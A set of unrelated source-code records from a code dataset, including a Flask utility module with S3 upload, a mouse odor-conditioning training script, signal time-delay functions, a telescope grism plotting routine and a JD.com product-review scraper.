print(\"Error\")\n","sub_path":"TachibanaAligner/FFTAligner.py","file_name":"FFTAligner.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"545965380","text":"#: 여기저기서 자꾸쓰는 함수 모음집\nfrom app import app, db\nfrom flask import request, session, make_response, jsonify\nfrom sqlalchemy import Table, MetaData, text, exc\nfrom flask_login import current_user\nfrom datetime import datetime, timedelta\nimport hashlib\nimport string\nimport random\nimport traceback\nimport io\n\nimport boto3\nS3 = boto3.client(\n 's3',\n aws_access_key_id=app.config['AWS_ACCESS_KEY_ID'],\n aws_secret_access_key=app.config['AWS_SECRET_ACCESS_KEY']\n # aws_session_token=SESSION_TOKEN,\n )\nBUCKET_NAME = 
''\n\n\ndef convert_datetime4mysql(basedate):\n \"\"\"\n client에서 보내주는 datetime이 MySQL 포맷에 맞지 않기 때문에 포맷형식을 바꿔주는 함수입니다\n \"\"\"\n formatfrom = \"%a, %d %b %Y %H:%M:%S GMT\"\n formatto = \"%Y-%m-%d %H:%M:%S\"\n convertdate = datetime.strptime(basedate, formatfrom).strftime(formatto)\n return convertdate\n\n\ndef create_sha512_hash(password):\n m = hashlib.sha512()\n m.update(password.encode('utf-8'))\n return m.hexdigest()\n\n\ndef create_md5_hash(sth):\n md5 = hashlib.md5()\n md5.update(sth.encode('utf-8'))\n return md5.hexdigest()\n\n\ndef create_sha1_token(sth, size=13):\n \"\"\"\n 토큰 만들기\n sth과 현재시간(UTC)을 가지고 해싱하여 토큰을 만든다.\n\n :param sth: 이 함수를 사용하는 어딘가에서 쓰이는 아무 변수\n :param len: 원하는 토큰의 길이\n :return:\n \"\"\"\n m = hashlib.sha1()\n\n t1 = sth + str(datetime.utcnow())\n m.update(t1.encode('utf-8'))\n t2 = m.hexdigest()\n t3 = t2 + string.ascii_uppercase\n\n token = ''.join(random.choice(t3) for _ in range(size))\n return token\n\n\ndef upload_photo_to_bytes_on_s3(picture, mimetype, name):\n \"\"\"\n S3에 Bytes로 사진 저장하기\n :param picture: 사진, bytes\n :param mimetype:\n :param name:\n :return: S3에 저장한 이름과 URL + 성공유무\n \"\"\"\n try:\n t = ''\n pname = ''\n\n S3.upload_fileobj(io.BytesIO(picture), BUCKET_NAME, pname)\n\n # purl = S3.generate_presigned_url(\n # ClientMethod='get_object',\n # Params={\n # 'Bucket': BUCKET_NAME,\n # 'Key': pname\n # }\n # )\n\n return pname, True\n except:\n traceback.print_exc()\n return None, False\n","sub_path":"app/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"42518411","text":"'''\nCreated on July 17, 2019\nthe code for running two setup in parallel\n@author: Selina Qian\n'''\nfrom ScopeFoundry import Measurement\nimport datetime\nimport numpy as np\nimport random\nimport pickle\nimport time\nfrom AntCamHW.daq_do.daq_do_dev import DAQSimpleDOTask\nfrom AntCamHW.daq_di.daq_di_dev import DAQSimpleDITask\nfrom openpyxl import Workbook\nimport os\nimport logging\n\nclass OdorGen(object):\n def __init__(self,odorindex):\n self.odorindex = odorindex\n self.odors_DAQ = []\n\n\n def assign_odor(self):\n # initiate all the odor solenoids\n for item in self.odorindex:\n self.odors_DAQ.append(DAQSimpleDOTask('Dev2_SELECT/port0/line{}'.format(item)))\n print('Odor {} has been properly assigned'.format(self.odorindex))\n\n def set_rewardodor(self, index: list):\n reward_odor = self.odors_DAQ[index[0]]\n non_reward_odor = self.odors_DAQ[index[1]]\n if len(self.odorindex) == 3:\n control_odor = self.odors_DAQ[index[2]]\n\n print('reward odor, unrewarded odor and control odor loaded')\n return reward_odor, non_reward_odor, control_odor\n else:\n print('reward odor, unrewarded odor loaded')\n return reward_odor, non_reward_odor\n\n def initiate(self):\n for odor in self.odors_DAQ:\n odor.low()\n print('Odor initiation: status low')\n\n def close(self):\n for odor in self.odors_DAQ:\n odor.close()\n print('Connection has been closed')\n\n\nclass SelinaTraining(Measurement):\n def __init__(self):\n # please change this according to mouse\n # two mice together\n self.mouse = ['C35','C36'] #OT-GC-2\n\n self.phase = 'cond' #'cond', 'deg','C_control','close','far'\n self.condition = 'Pav'\n self.numtrials = 20\n\n self.list = [7, 6, 5]\n # two file saving path\n self.events_path_0 = \"C:/Users/MurthyLab/Desktop/Selina_lab_computer_data/experiment_data_2021_7_{0}/{1}/\".format(\n self.condition,self.mouse[0])\n self.events_path_1 = 
\"C:/Users/MurthyLab/Desktop/Selina_lab_computer_data/experiment_data_2021_7_{0}/{1}/\".format(\n self.condition, self.mouse[1])\n self.events_filename = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M\")+'{}.xlsx'.format(self.phase)\n\n self.filename_0 = self.events_path_0 + self.events_filename\n self.filename_1 = self.events_path_1 + self.events_filename\n\n self.odor_index = [1,0,2] #odor list index position 0 is reward, 1 is unrewarded, 2 is control c odor; so here, 7 is unrewarded, 6 is reward and 5 is c odor\n if self.condition == 'Operant':\n self.operant = True\n self.licknum = 1\n else:\n self.operant = False\n self.licknum = 0\n\n\n # pre training\n self.p_go = 0.4#0.5\n self.p_reward_go = 0.75\n self.p_no_go = 0.2#0.2\n self.p_empty = 0.4#0.3\n if self.phase == 'cond':\n self.p_reward_empty = 0 # 0.3\n else: # 'deg','C-control','close','far'\n self.p_reward_empty = 0.75\n\n\n self.counter = np.zeros(9)\n\n self.duration_rec_on_before = 1\n self.duration_odor_on = 1\n self.duration_odor_to_action = 0\n self.duration_action_window = 2.5\n self.duration_water_large = 0.08 #0.1\n self.duration_rec_on_after = 1\n self.duration_ITI = np.random.exponential(1, size=self.numtrials)\n\n self.waterline_0 = 0\n self.waterline_1 = 1\n\n\n def run(self):\n try:\n os.makedirs(self.events_path_0)\n os.makedirs(self.events_path_1)\n except OSError:\n print(\"The directory %s existed\" % self.events_path_0)\n else:\n print(\"Successfully created the directory %s \" % self.events_path_0)\n logname_0 = self.filename_0[0:-5] + '.log'\n logname_1 = self.filename_1[0:-5] + '.log'\n logging.basicConfig(filename=logname_0, level=logging.DEBUG)\n logging.info(self.__dict__)\n logging.basicConfig(filename=logname_1, level=logging.DEBUG)\n logging.info(self.__dict__)\n self.lick_0 = DAQSimpleDITask('Dev2_SELECT/port2/line0')\n self.lick_1 = DAQSimpleDITask('Dev2_SELECT/port2/line1')\n print('water done')\n odors_cue = OdorGen(self.list)\n odors_cue.assign_odor()\n self.reward_odor, self.non_reward_odor, self.control_odor = odors_cue.set_rewardodor(index=self.odor_index)\n odors_cue.initiate()\n # odors_cue.odors_DAQ[i]\n print('odor done')\n\n self.water_0 = DAQSimpleDOTask('Dev2_SELECT/port0/line{}'.format(self.waterline_0))\n self.water_0.low()\n self.water_1 = DAQSimpleDOTask('Dev2_SELECT/port0/line{}'.format(self.waterline_1))\n self.water_1.low()\n # self.OdorOnCopy = DAQSimpleDOTask('Dev3/port2/line5')\n # self.OdorOnCopy.low()\n\n\n # EVENT CODES\n # video recording start / start trial = 101\n # end trial = 100\n # lick on = 11, lick off = 10\n\n # reward odor on = 131, off = 130, water on = 51, water off = 50\n # no reward odor on = 141, off = 140\n # c control odor on = 161, off = 160, water on = 51, water off = 50\n\n # create two excel workbooks\n self.wb0 = Workbook()\n self.ws0 = self.wb0.active\n self.wb1 = Workbook()\n self.ws1 = self.wb1.active\n\n\n #generate trial type\n\n # generate trial type\n trialtypes = np.zeros(self.numtrials)\n for i in range(int(self.numtrials/20)):\n train_go = np.zeros(int(round(20 * self.p_go * self.p_reward_go))) # code 0\n train_nogo = np.ones(int(20 * self.p_no_go)) # code 1\n temp_comb1 = np.concatenate((train_go,train_nogo))\n train_go_omission = np.ones(int(round(20 * self.p_go * (1 - self.p_reward_go)))) * 3 # code 3\n temp_comb1 = np.concatenate((temp_comb1, train_go_omission))\n if self.phase == 'cond':\n train_empty = np.ones(int(20 * self.p_empty* (1-self.p_reward_empty))) * 2 # code 2\n\n temp_comb1 = np.concatenate((temp_comb1, train_empty))\n 
elif self.phase == 'deg':\n train_unpredwater = np.ones(int(20 * self.p_empty* self.p_reward_empty)) * 4 # code 4\n temp_comb1 = np.concatenate((temp_comb1, train_unpredwater))\n train_empty = np.ones(int(20 * self.p_empty * (1 - self.p_reward_empty))) * 2 # code 2\n temp_comb1 = np.concatenate((temp_comb1, train_empty))\n elif self.phase == 'close':\n train_unpredwater = np.ones(int(20 * self.p_empty * self.p_reward_empty)) * 7 # code 4\n temp_comb1 = np.concatenate((temp_comb1, train_unpredwater))\n train_empty = np.ones(int(20 * self.p_empty * (1 - self.p_reward_empty))) * 2 # code 2\n temp_comb1 = np.concatenate((temp_comb1, train_empty))\n elif self.phase == 'far':\n train_unpredwater = np.ones(int(20 * self.p_empty * self.p_reward_empty)) * 8 # code 4\n temp_comb1 = np.concatenate((temp_comb1, train_unpredwater))\n train_empty = np.ones(int(20 * self.p_empty * (1 - self.p_reward_empty))) * 2 # code 2\n temp_comb1 = np.concatenate((temp_comb1, train_empty))\n elif self.phase == 'C_control':\n train_ccontrol = np.ones(int(20 * self.p_empty * self.p_reward_empty)) * 5 # code 4\n temp_comb1 = np.concatenate((temp_comb1, train_ccontrol))\n train_ccontrol_nogo = np.ones(int(20 * self.p_empty * (1 - self.p_reward_empty))) * 6 # code 2\n print(len(train_ccontrol_nogo))\n print(len(train_ccontrol))\n temp_comb1 = np.concatenate((temp_comb1, train_ccontrol_nogo))\n\n temp_comb2 = temp_comb1.copy()\n random.shuffle(temp_comb2)\n trialtypes[20*i:20*(i+1)] = temp_comb2\n self.trialstype = trialtypes\n print('================== Trial Types =================')\n print(trialtypes)\n for t in range(0, self.numtrials):\n print('================================================')\n print('trial number: ', t)\n\n d0 = self.ws0.cell(row=(self.ws0.max_row + 1), column=1, value=time.clock())\n d0 = self.ws0.cell(row=self.ws0.max_row, column=2, value=101) #trial start\n d0 = self.ws0.cell(row=self.ws0.max_row, column=3, value= 'trial{}'.format(int(trialtypes[t]))) #trial type\n\n d1 = self.ws1.cell(row=(self.ws1.max_row + 1), column=1, value=time.clock())\n d1 = self.ws1.cell(row=self.ws1.max_row, column=2, value=101) # trial start\n d1 = self.ws1.cell(row=self.ws1.max_row, column=3, value='trial{}'.format(int(trialtypes[t]))) # trial type\n # code: 0--go w rward; 1--no go; 2--empty; 3--go w/o reward; 4 --unpred water; 5 -- c control odor; 6 -- c control odor w/o\n if int(trialtypes[t]) in [7,8]:\n\n # main training program\n self.run_trial_type(int(trialtypes[t]))\n\n\n else:\n self.check_licking_1spout(self.duration_rec_on_before)\n # main training program\n self.run_trial_type(int(trialtypes[t]))\n\n self.check_licking_1spout(self.duration_rec_on_after)\n # self.settings.save_video.update_value(False):\n self.check_licking_1spout(self.duration_ITI[t])\n\n d0 = self.ws0.cell(row=(self.ws0.max_row + 1), column=1, value=time.clock())\n d0 = self.ws0.cell(row=self.ws0.max_row, column=2, value=100) # end\n\n d1 = self.ws1.cell(row=(self.ws1.max_row + 1), column=1, value=time.clock())\n d1 = self.ws1.cell(row=self.ws1.max_row, column=2, value=100) #end\n self.wb0.save(self.filename_0)\n self.wb1.save(self.filename_1)\n odors_cue.initiate()\n odors_cue.close()\n self.water_0.low()\n self.water_0.close()\n self.water_1.low()\n self.water_1.close()\n print('FINISHED ASSOCIATION TRAINING')\n\n def check_licking_1spout(self, interval,check_action=False):\n checkperiod = 0.002\n timeout = time.time() + interval\n reward_on = True # this is used for Pav or Operant\n right_lick_last = 0\n left_lick_last = 0\n count = 
0\n while time.time() < timeout:\n right_lick = self.lick_0.read()\n # print('right lick', right_lick)\n\n left_lick = self.lick_1.read()\n # print('left lick', left_lick)\n if right_lick != right_lick_last:\n if right_lick:\n print('Lick 0')\n d0 = self.ws0.cell(row=(self.ws0.max_row + 1), column=1, value=time.clock())\n d0= self.ws0.cell(row=self.ws0.max_row, column=2, value=11)\n\n # self.save_training()\n if check_action:\n count += 1\n else:\n d0 = self.ws0.cell(row=(self.ws0.max_row + 1), column=1, value=time.clock())\n d0 = self.ws0.cell(row=self.ws0.max_row, column=2, value=10)\n\n else:\n pass\n\n if left_lick != left_lick_last:\n if left_lick:\n print('Lick 1')\n d1 = self.ws1.cell(row=(self.ws1.max_row + 1), column=1, value=time.clock())\n d1 = self.ws1.cell(row=self.ws1.max_row, column=2, value=11)\n\n # self.save_training()\n if check_action:\n count += 1\n else:\n d1 = self.ws1.cell(row=(self.ws1.max_row + 1), column=1, value=time.clock())\n d1 = self.ws1.cell(row=self.ws1.max_row, column=2, value=10)\n\n else:\n pass\n right_lick_last = right_lick\n left_lick_last = left_lick\n time.sleep(checkperiod)\n if check_action and count >= self.licknum:\n\n print('licking activate reward')\n elif check_action and count < self.licknum:\n print('not enough licking')\n reward_on = False\n return reward_on\n\n def run_trial_type(self, types):\n odor_on = False\n reward_on = False\n is_control = False\n if types == 0:\n print('go trial ' + str(int(self.counter[types])))\n odor_on = True # contingency odor comes\n is_go = True\n r_code = [131, 130]\n w_code = [51, 50]\n self.run_odor_module(odor_on, is_go, is_control, r_code)\n self.check_licking_1spout(self.duration_odor_to_action)\n reward_on = self.check_licking_1spout(self.duration_action_window, self.operant) ### can be a problem\n self.run_reward_module(reward_on, w_code)\n\n elif types == 1:\n print('no go trial ' + str(int(self.counter[types])))\n\n odor_on = True\n is_go = False\n r_code = [141, 140]\n w_code = [61, 60]\n self.run_odor_module(odor_on,is_go, is_control, r_code)\n self.check_licking_1spout(self.duration_odor_to_action+self.duration_action_window)\n reward_on = False\n self.run_reward_module(reward_on, w_code)\n elif types == 5:\n print('control C trial ' + str(int(self.counter[types])))\n\n odor_on = True\n is_go = False\n is_control = True\n r_code = [161, 160]\n w_code = [51, 50]\n self.run_odor_module(odor_on,is_go, is_control, r_code)\n self.check_licking_1spout(self.duration_odor_to_action+self.duration_action_window)\n reward_on = self.check_licking_1spout(self.duration_action_window, self.operant)\n self.run_reward_module(reward_on, w_code)\n\n elif types == 2:\n print('empty trial ' + str(int(self.counter[types])))\n # odor false: control odor comes\n w_code = [71, 70]# not used\n # self.run_odor_module(odor_on, r_code)\n self.check_licking_1spout(self.duration_odor_on)\n self.check_licking_1spout(self.duration_odor_to_action+self.duration_action_window)\n reward_on = False\n self.run_reward_module(reward_on, w_code)\n\n elif types == 3:\n print('go omission trial ' + str(int(self.counter[types])))\n odor_on = True # contingency odor comes\n is_go = True\n r_code = [131, 130]\n w_code = [51, 50]\n self.run_odor_module(odor_on, is_go, is_control, r_code)\n self.check_licking_1spout(self.duration_odor_to_action + self.duration_action_window)\n self.run_reward_module(reward_on, w_code)\n\n elif types == 6:\n print('c odor omission ' + str(int(self.counter[types])))\n odor_on = True # contingency odor comes\n 
is_go = False\n is_control = True\n r_code = [161, 160]\n w_code = [51, 50]\n self.run_odor_module(odor_on, is_go, is_control, r_code)\n self.check_licking_1spout(self.duration_odor_to_action + self.duration_action_window)\n self.run_reward_module(reward_on, w_code)\n\n elif types == 4:\n print('unpredicted water trial ' + str(int(self.counter[types])))\n w_code = [51, 50]\n self.check_licking_1spout(self.duration_odor_on)\n self.check_licking_1spout(self.duration_odor_to_action)\n reward_on = self.check_licking_1spout(self.duration_action_window, self.operant)\n self.run_reward_module(reward_on, w_code)\n\n elif types == 7:\n print('close unpredicted water trial ' + str(int(self.counter[types])))\n w_code = [51, 50]\n reward_on = self.check_licking_1spout(0, self.operant)\n self.run_reward_module(reward_on, w_code)\n self.check_licking_1spout(self.duration_odor_on+2)\n self.check_licking_1spout(self.duration_action_window)\n\n elif types == 8:\n print('far unpredicted water trial ' + str(int(self.counter[types])))\n w_code = [51, 50]\n self.check_licking_1spout(self.duration_odor_on)\n self.check_licking_1spout(self.duration_odor_to_action+2)\n reward_on = self.check_licking_1spout(self.duration_action_window, self.operant)\n self.run_reward_module(reward_on, w_code)\n self.counter[types] += 1\n\n\n\n def run_odor_module(self, odor_on, is_go, is_control, r_code):\n if odor_on:\n print('opening odor port')\n if is_go and not is_control:\n self.reward_odor.high()\n elif not is_go and not is_control:\n self.non_reward_odor.high()\n elif is_control:\n self.control_odor.high()\n # self.OdorOnCopy.high() # ???\n d0 = self.ws0.cell(row=(self.ws0.max_row + 1), column=1, value=time.clock())\n d0 = self.ws0.cell(row=self.ws0.max_row, column=2, value=r_code[0])\n d1 = self.ws1.cell(row=(self.ws1.max_row + 1), column=1, value=time.clock())\n d1 = self.ws1.cell(row=self.ws1.max_row, column=2, value=r_code[0])\n # self.save_training()\n self.check_licking_1spout(self.duration_odor_on)\n print('closing odor port')\n if is_go and not is_control:\n self.reward_odor.low()\n elif not is_go and not is_control:\n self.non_reward_odor.low()\n elif is_control:\n self.control_odor.low()\n d0 = self.ws0.cell(row=(self.ws0.max_row + 1), column=1, value=time.clock())\n d0 = self.ws0.cell(row=self.ws0.max_row, column=2, value=r_code[1])\n d1 = self.ws1.cell(row=(self.ws1.max_row + 1), column=1, value=time.clock())\n d1 = self.ws1.cell(row=self.ws1.max_row, column=2, value=r_code[1])\n else:\n self.check_licking_1spout(self.duration_odor_on)\n\n def run_reward_module(self, reward_on, w_code):\n if reward_on:\n # modify! 
give water if licks three times within 1 s\n print('opening water valve')\n self.water_0.high()\n self.water_1.high()\n\n d0 = self.ws0.cell(row=(self.ws0.max_row + 1), column=1, value=time.clock())\n d0 = self.ws0.cell(row=self.ws0.max_row, column=2, value=w_code[0])\n d1 = self.ws1.cell(row=(self.ws1.max_row + 1), column=1, value=time.clock())\n d1 = self.ws1.cell(row=self.ws1.max_row, column=2, value=w_code[0])\n self.check_licking_1spout(self.duration_water_large) # this parameter hasn't een defined\n print('closing water valve')\n self.water_0.low()\n self.water_1.low()\n d0 = self.ws0.cell(row=(self.ws0.max_row + 1), column=1, value=time.clock())\n d0 = self.ws0.cell(row=self.ws0.max_row, column=2, value=w_code[1])\n d1 = self.ws1.cell(row=(self.ws1.max_row + 1), column=1, value=time.clock())\n d1 = self.ws1.cell(row=self.ws1.max_row, column=2, value=w_code[1])\n else:\n self.check_licking_1spout(self.duration_water_large)\n\n\n# def camera_action(self):\n# '''\n# format the image properly\n# '''\n# try:\n# wide_image = self.wide_cam.read()\n# wide_image_data = self.wide_cam.to_numpy(wide_image)\n# self.wide_disp_queue.put(wide_image_data)\n#\n# if self.settings.save_video.value() and self.settings.in_trial.value() :\n# self.recorder.save_frame(self.settings.filename.value(),wide_image)\n#\n# except Exception as ex:\n# print('Error : %s' % ex)\n\n\n\n\n\ntest = SelinaTraining()\nprint('start')\ntest.run()\n\n\n","sub_path":"AntCamMS/Selina_CD_two_setup_v1.py","file_name":"Selina_CD_two_setup_v1.py","file_ext":"py","file_size_in_byte":19990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"270215960","text":"class Solution:\n # @param num: a rotated sorted array\n # @return: the minimum number in the array\n def findMin(self, num):\n # write your code here\n if num == None or len(num) == 0:\n return 0\n front = 0\n end = len(num)-1\n\n result = sys.maxint\n while front <= end and front >=0:\n mid = (front+end)/2\n # case 1: no in orded subarray\n if num[front] > num[end] :\n front = mid+1\n else:\n # case 2: already in a orded subarray, search for the lowest value\n if result > num[front]:\n result = num[front]\n front -= 1\n end = mid - 1\n\n return result\n","sub_path":"downloads/code/LintCode/Find-Minimum-in-Rotated-Array.py","file_name":"Find-Minimum-in-Rotated-Array.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"550925657","text":"import numpy as np\nimport math\nfrom scipy.signal import hilbert\nimport torch\nfrom utils import *\ntorch.set_default_tensor_type('torch.cuda.FloatTensor')\nimport cmath\nimport matplotlib.pyplot as plt\n\n\n# 0 error in unit test\ndef torchTimeDelay(x, fs, tau):\n # Delay a signal in time\n df = fs / torch.tensor([len(x) * 1.0], requires_grad=True)\n f_ind = torch.linspace(0, len(x) - 1, steps=len(x))\n f = f_ind * df.item()\n f[f > (fs.item() / 2)] -= fs.item()\n\n arg = 2*torch.tensor([math.pi])*tau*f\n sign = torch.tensor([-1.0], requires_grad=True)\n pr = compExp(arg, sign)\n X = torch.fft(torchHilbert(x), 1)\n tsd = torch.ifft(compMul(X, pr), 1)[:, 0] # Only return the real values\n return tsd.cuda()\n\n\ndef timeDelay(x, fs, tau):\n # Delay a signal in time\n df = fs / len(x)\n f = np.linspace(0, len(x) - 1, len(x)) * df\n f[f > (fs / 2)] = f[f > (fs / 2)] - fs\n arg = 2 * math.pi*tau*f\n pr = np.exp(-1j * 2 * math.pi * tau * f)\n #print(pr)\n\n #print(pr)\n\n if np.isreal(x).any():\n X = 
np.fft.fft(hilbert(x))\n        tsd = (np.fft.ifft(np.multiply(X, pr))).real\n    else:\n        X = np.fft.fft(x)\n        tsd = np.fft.ifft(np.multiply(X, np.conj(pr)))\n    return tsd\n","sub_path":"timeDelay.py","file_name":"timeDelay.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"522508310","text":"# Kornpob Bhirombhakdi\n# kbhirombhakdi@stsci.edu\n\nfrom astropy.io import fits\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef show_overview(gfile,dfile,xyd,xyref,xh,yh,ww,objname,save=False,container=None,\n                  params={'figsize':(10,10),\n                          '221':{'minmax':(5.,99.),'cmap':'viridis','s':30,'facecolor':'None','edgecolor':'red','fontsize':12,'title':'default'},\n                          '222':{'minmax':(5.,99.),'cmap':'viridis','s':30,'facecolor':'None','edgecolor':'red','padxy':(50,50),'fontsize':12,'title':'default'},\n                          '223':{'minmax':(5.,99.),'cmap':'viridis','s':30,'facecolor':'None','edgecolor':'red','color':'red','ls':'-','lw':4,'alpha':0.6,'fontsize':12,'title':'default'},\n                          '224':{'minmax':(5.,99.),'cmap':'viridis','s':30,'facecolor':'None','edgecolor':'red','color':'red','ls':'-','lw':4,'alpha':0.6,'padxy':(50,50),'tickperx':50,'annotate_marker':'ro','annotate_color':'red','annotate_fontsize':8,'annotate_rotation':30.,'fontsize':12,'title':'default'},\n                          }\n                 ):\n    \"\"\"\n    show_overview plots 2x2 of direct and grism images with zoom-in to the object location.\n    - gfile = (path to grism file, extension)\n    - dfile = (path to direct file, extension)\n    - xyd = (pixX,pixY) of the object in the direct image\n    - xyref = (xref,yref) of the object in the grism image\n    - xh,yh,ww = trace and wavelength map\n    - objname = object name which will be used for the plot title\n    - save = True if user wants an output file for the plot, given container\n    - params = customizable plot parameters\n    \"\"\"\n    pixx,pixy = xyd\n    xref,yref = xyref\n    xg,yg = xh+xref,yh+yref\n    plt.figure(figsize=params['figsize'])\n    # 221\n    ax1 = plt.subplot(2,2,1)\n    fontsize = params['221']['fontsize']\n    tmpdata = fits.open(dfile[0])[dfile[1]].data\n    m = np.isfinite(tmpdata)\n    vmin,vmax = np.percentile(tmpdata[m],params['221']['minmax'][0]),np.percentile(tmpdata[m],params['221']['minmax'][1])\n    ax1.imshow(tmpdata,origin='lower',cmap=params['221']['cmap'],vmin=vmin,vmax=vmax)\n    ax1.scatter(pixx,pixy,s=params['221']['s'],facecolor=params['221']['facecolor'],edgecolor=params['221']['edgecolor'])\n    if params['221']['title'] == 'default':\n        tmpheader = fits.open(dfile[0])[0].header\n        string = '{0} {1} {2} {3}'.format(objname,tmpheader['ROOTNAME'],tmpheader['DATE-OBS'],tmpheader['FILTER'])\n        string += '\\nEXPSTART={0:.3f} EXPTIME={1:.3f}'.format(tmpheader['EXPSTART'],tmpheader['EXPTIME'])\n    else:\n        string = params['221']['title']\n    ax1.set_title(string,fontsize=fontsize)\n    # 222\n    ax2 = plt.subplot(2,2,2)\n    fontsize = params['222']['fontsize']\n    dx,dy = params['222']['padxy']\n    tmpdata = fits.open(dfile[0])[dfile[1]].data\n    m = np.isfinite(tmpdata)\n    vmin,vmax = np.percentile(tmpdata[m],params['222']['minmax'][0]),np.percentile(tmpdata[m],params['222']['minmax'][1])\n    ax2.imshow(tmpdata,origin='lower',cmap=params['222']['cmap'],vmin=vmin,vmax=vmax)\n    ax2.scatter(pixx,pixy,s=params['222']['s'],facecolor=params['222']['facecolor'],edgecolor=params['222']['edgecolor'])\n    ax2.set_xlim(pixx-dx,pixx+dx)\n    ax2.set_ylim(pixy-dy,pixy+dy)\n    if params['222']['title'] == 'default':\n        string = 'xyd = {0:.1f},{1:.1f}'.format(pixx,pixy)\n    else:\n        string = params['222']['title']\n    
ax2.set_title(string,fontsize=fontsize)\n    # 223\n    ax3 = plt.subplot(2,2,3)\n    fontsize = params['223']['fontsize']\n    tmpdata = fits.open(gfile[0])[gfile[1]].data\n    m = np.isfinite(tmpdata)\n    vmin,vmax = np.percentile(tmpdata[m],params['223']['minmax'][0]),np.percentile(tmpdata[m],params['223']['minmax'][1])\n    ax3.imshow(tmpdata,origin='lower',cmap=params['223']['cmap'],vmin=vmin,vmax=vmax)\n    ax3.plot(xg,yg,color=params['223']['color'],ls=params['223']['ls'],lw=params['223']['lw'],alpha=params['223']['alpha'])\n    if params['223']['title'] == 'default':\n        tmpheader = fits.open(gfile[0])[0].header\n        string = '{0} {1} {2} {3}'.format(objname,tmpheader['ROOTNAME'],tmpheader['DATE-OBS'],tmpheader['FILTER'])\n        string += '\\nEXPSTART={0:.3f} EXPTIME={1:.3f}'.format(tmpheader['EXPSTART'],tmpheader['EXPTIME'])\n    else:\n        string = params['223']['title'] \n    ax3.set_title(string,fontsize=fontsize)\n    # 224\n    ax4 = plt.subplot(2,2,4)\n    fontsize = params['224']['fontsize']\n    tickperx = params['224']['tickperx']\n    dx,dy = params['224']['padxy']\n    annotate_marker = params['224']['annotate_marker']\n    annotate_color = params['224']['annotate_color']\n    annotate_fontsize = params['224']['annotate_fontsize']\n    annotate_rotation = params['224']['annotate_rotation']\n    tmpdata = fits.open(gfile[0])[gfile[1]].data\n    m = np.isfinite(tmpdata) \n    vmin,vmax = np.percentile(tmpdata[m],params['224']['minmax'][0]),np.percentile(tmpdata[m],params['224']['minmax'][1])\n    ax4.imshow(tmpdata,origin='lower',cmap=params['224']['cmap'],vmin=vmin,vmax=vmax)\n    ax4.plot(xg,yg,color=params['224']['color'],ls=params['224']['ls'],lw=params['224']['lw'],alpha=params['224']['alpha'])\n    for i,ii in enumerate(xg):\n        if (i in {0,len(xg)-1}) or (np.mod(i,tickperx)==0):\n            label = '{0}A'.format(int(ww[i]))\n            ax4.plot(xg[i],yg[i],annotate_marker)\n            ax4.annotate(label,(xg[i],yg[i]),\n                         textcoords='offset points',\n                         xytext=(0,10),\n                         ha='center',\n                         fontsize=annotate_fontsize,\n                         rotation=annotate_rotation,\n                         color=annotate_color\n                        )\n    ax4.set_xlim(xg.min()-dx,xg.max()+dx)\n    ax4.set_ylim(yg.min()-dy,yg.max()+dy) \n    if params['224']['title'] == 'default':\n        string = 'xyref = {0:.1f},{1:.1f}'.format(xref,yref) \n    else:\n        string = params['224']['title'] \n    ax4.set_title(string,fontsize=fontsize)\n    plt.tight_layout()\n    if save:\n        if container is None:\n            raise ValueError('container must be specified to save.')\n        saveprefix = container.data['saveprefix']\n        savefolder = container.data['savefolder']\n        saveformat = container.data['plotformat']\n        string = './{2}/{0}_overview.{1}'.format(saveprefix,saveformat,savefolder)\n        plt.savefig(string,format=saveformat,bbox_inches='tight')\n        print('Save {0}\\n'.format(string))\n\n\n","sub_path":"build/lib/hstgrism/show_overview.py","file_name":"show_overview.py","file_ext":"py","file_size_in_byte":6407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"308657146","text":"import urllib.request\nimport json\nimport time\nimport random\nimport pymysql.cursors\nimport pandas as pd \n\nproductNames = []\ncoms = []\ncontents = []\ndef crawlProductComment(url,page):\n\n    #read the raw data (note: use gbk encoding)\n    html = urllib.request.urlopen(url).read().decode('gbk')\n\n    #extract the JSON-formatted data from the raw response (delimited by '{' at the start and '}' at the end)\n    jsondata = html[27:-2]\n    #print(jsondata)\n    data = json.loads(jsondata)\n\n    #print(data['comments'])\n    #print(data['comments'][0]['content'])\n    #iterate over the list of product reviews\n    for i in data['comments']:\n        productName = i['referenceName']\n        commentTime = i['creationTime']\n        content = i['content']\n\n        
#print the key information of each product review\n        print(\"Product full name: {}\".format(productName))\n        print(\"Review time: {}\".format(commentTime))\n        print(\"Review content: {}\".format(content))\n        print(\"-----------------------------\")\n        productNames.append(productName)\n        coms.append(commentTime)\n        contents.append(content)\n\n    '''\n    database operations\n    '''\n\n    # #get the database connection\n    # connection = pymysql.connect(host = 'localhost',\n    #                              user = 'root',\n    #                              password = '',\n    #                              db = 'cmac',\n    #                              charset = 'utf8mb4')\n    # try:\n    #     #get the session cursor\n    #     with connection.cursor() as cursor:\n    #         #build the sql statement\n    #         sql = \"insert into `jd-mi6` (`productName`,`commentTime`,`content`) values (%s,%s,%s)\"\n\n    #         #execute the sql statement\n    #         cursor.execute(sql,(productName,commentTime,content))\n\n    #         #commit to the database\n    #         connection.commit()\n    # finally:\n    #     connection.close()\n\n\nfor i in range(0,100):\n    print(\"Fetching page {} of review data!\".format(i+1))\n    #Xiaomi Mi 6 review link; change the page parameter to loop over multiple pages of reviews\n    url = 'https://club.jd.com/comment/productPageComments.action?callback=fetchJSON_comment98vv56668&productId=4335129&score=0&sortType=5&page=' + str(i) +'&pageSize=10&isShadowSku=0&fold=1'\n    crawlProductComment(url,i)\n    df2 = pd.DataFrame({'product_full_name':productNames,'review_time':coms,'review_content':contents})\n    df2.to_csv('a.csv')\n    file_name = open('restxt.txt','w',encoding='utf-8')\n    file_name.writelines(contents)\n    file_name.close()\n    #set the sleep interval\n    # 